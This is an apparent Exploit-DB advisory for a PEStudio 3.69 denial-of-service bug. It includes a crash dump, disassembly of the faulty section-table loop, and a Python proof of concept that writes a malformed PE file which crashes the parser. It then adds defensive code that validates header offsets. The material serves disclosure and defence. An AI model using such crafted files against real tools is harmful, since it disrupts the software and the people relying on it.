exploit-db-mirror/exploits/windows/dos/25972.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.
'''
[+] Affected Module : peparser.dll version 3.69
[+] Crash Point:
(6b4.17c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141
eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Documents and Settings\debasish mandal\Desktop\Tools\PeStudio369\PeParser.dll -
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c mov edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=????????
0:000> u eip
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c mov edx,dword ptr [ecx+0Ch]
3001ce73 3bda cmp ebx,edx
3001ce75 7209 jb PeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80)
3001ce77 8b6908 mov ebp,dword ptr [ecx+8]
3001ce7a 03ea add ebp,edx
3001ce7c 3bdd cmp ebx,ebp
3001ce7e 720c jb PeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c)
3001ce80 46 inc esi
[+] IDA Pro Snap of the Buggy Function: (Code from peparser.dll version 3.69)
.text:3001CE40 sub_3001CE40 proc near ; CODE XREF: sub_30003510+154p
.text:3001CE40 ; sub_300184D0+4Bp
.text:3001CE40 mov ecx, [ecx+4]
.text:3001CE43 xor eax, eax
.text:3001CE45 test ecx, ecx
.text:3001CE47 jz short locret_3001CE91
.text:3001CE49 mov edx, [ecx+1Ch]
.text:3001CE4C movzx ecx, word ptr [edx+14h]
.text:3001CE50 lea ecx, [ecx+edx+18h]
.text:3001CE54 test ecx, ecx
.text:3001CE56 jz short locret_3001CE91
.text:3001CE58 test ebx, ebx
.text:3001CE5A jz short locret_3001CE91
.text:3001CE5C push esi
.text:3001CE5D push edi
.text:3001CE5E movzx edi, word ptr [edx+6]
.text:3001CE62 xor esi, esi
.text:3001CE64 test edi, edi
.text:3001CE66 jle short loc_3001CE8F
.text:3001CE68 push ebp
.text:3001CE69 lea esp, [esp+0]
.text:3001CE70
.text:3001CE70 loc_3001CE70: ; CODE XREF: sub_3001CE40+46j
.text:3001CE70 mov edx, [ecx+0Ch] <-- Crash
.text:3001CE73 cmp ebx, edx
.text:3001CE75 jb short loc_3001CE80
.text:3001CE77 mov ebp, [ecx+8]
.text:3001CE7A add ebp, edx
.text:3001CE7C cmp ebx, ebp
.text:3001CE7E jb short loc_3001CE8C
.text:3001CE80
.text:3001CE80 loc_3001CE80: ; CODE XREF: sub_3001CE40+35j
.text:3001CE80 inc esi
.text:3001CE81 add ecx, 28h
.text:3001CE84 cmp esi, edi
.text:3001CE86 jl short loc_3001CE70
.text:3001CE88 pop ebp
.text:3001CE89 pop edi
.text:3001CE8A pop esi
.text:3001CE8B retn
.text:3001CE8C ; ---------------------------------------------------------------------------
[+] Proof of Concept :
'''
#!/usr/bin/python
# Builds a 365-byte MZ/PE stub whose COFF header is filled with 'A' (0x41), so the
# parser reads NumberOfSections = 0x4141 and SizeOfOptionalHeader = 0x4141 (edi and
# the ecx arithmetic in the crash dump above) and walks far past the end of the file.
# Bytes literals so the script runs unchanged under Python 2 and 3.
header = b"MZ"
header += b"A" * 58                 # DOS header filler up to e_lfanew (offset 0x3c)
header += b"\x80\x00\x00\x00"       # e_lfanew = 0x80
header += b"A" * 3
header += b"\x0e"
header += b"A" * 60                 # pad up to offset 0x80
header += b"PE"                     # PE signature; the next two bytes come from the filler
header += b"A" * 235                # COFF header and everything after it: all 0x41
with open('POC.exe', 'wb') as f:
    f.write(header)
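The dump above shows the unchecked arithmetic that leads to the fault: ecx = 013f41d9 is the NT header at 013f0080 + 0x18 + SizeOfOptionalHeader (0x4141), and edi = 0x4141 is NumberOfSections, both lifted straight from the 'A' filler and never compared with the size of the mapped file. As an added example (not part of the original advisory or of PEStudio's code), the same section-table walk in Python with every header-derived offset validated against the file length first, plus a constructed header builder for testing; the names `section_table`, `rva_to_section` and `make_header` are assumptions.

```python
import struct

SECTION_HEADER_SIZE = 0x28  # sizeof(IMAGE_SECTION_HEADER)

def section_table(data: bytes):
    """Return (offset, count) of the section table, checking every
    header-derived offset against len(data) before it is used."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data):  # room for PE\0\0 (4) + COFF header (20)
        raise ValueError("e_lfanew points past end of file")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # The two fields the buggy loop trusts blindly: NumberOfSections (-> edi)
    # and SizeOfOptionalHeader (-> address of the first section header in ecx).
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    first = e_lfanew + 0x18 + opt_size
    if first + num_sections * SECTION_HEADER_SIZE > len(data):
        raise ValueError("section table (%d entries at 0x%x) exceeds %d-byte file"
                         % (num_sections, first, len(data)))
    return first, num_sections

def rva_to_section(data: bytes, rva: int):
    """Index of the section containing rva, or None. Mirrors loc_3001CE70:
    VirtualAddress is [hdr+0xC], VirtualSize is [hdr+8], stride 0x28."""
    first, count = section_table(data)
    for i in range(count):
        hdr = first + i * SECTION_HEADER_SIZE
        vsize, vaddr = struct.unpack_from("<II", data, hdr + 8)
        if vaddr <= rva < vaddr + vsize:
            return i
    return None

def make_header(num_sections: int, opt_size: int, sections=()) -> bytes:
    """Constructed sample: MZ stub with e_lfanew=0x80, PE\\0\\0, COFF header,
    zeroed optional header, then (name, VirtualSize, VirtualAddress) sections."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80) + b"\0" * 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, num_sections, 0, 0, 0, opt_size, 0x102)
    body = dos + b"PE\0\0" + coff + b"\0" * opt_size
    for name, vsize, vaddr in sections:
        body += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, 0, 0, 0, 0, 0, 0, 0)
    return body
```

Fed a header with the PoC's values (NumberOfSections and SizeOfOptionalHeader both 0x4141, truncated to 365 bytes), `section_table` raises instead of computing the out-of-file address 0x41d9 that the crash dump shows.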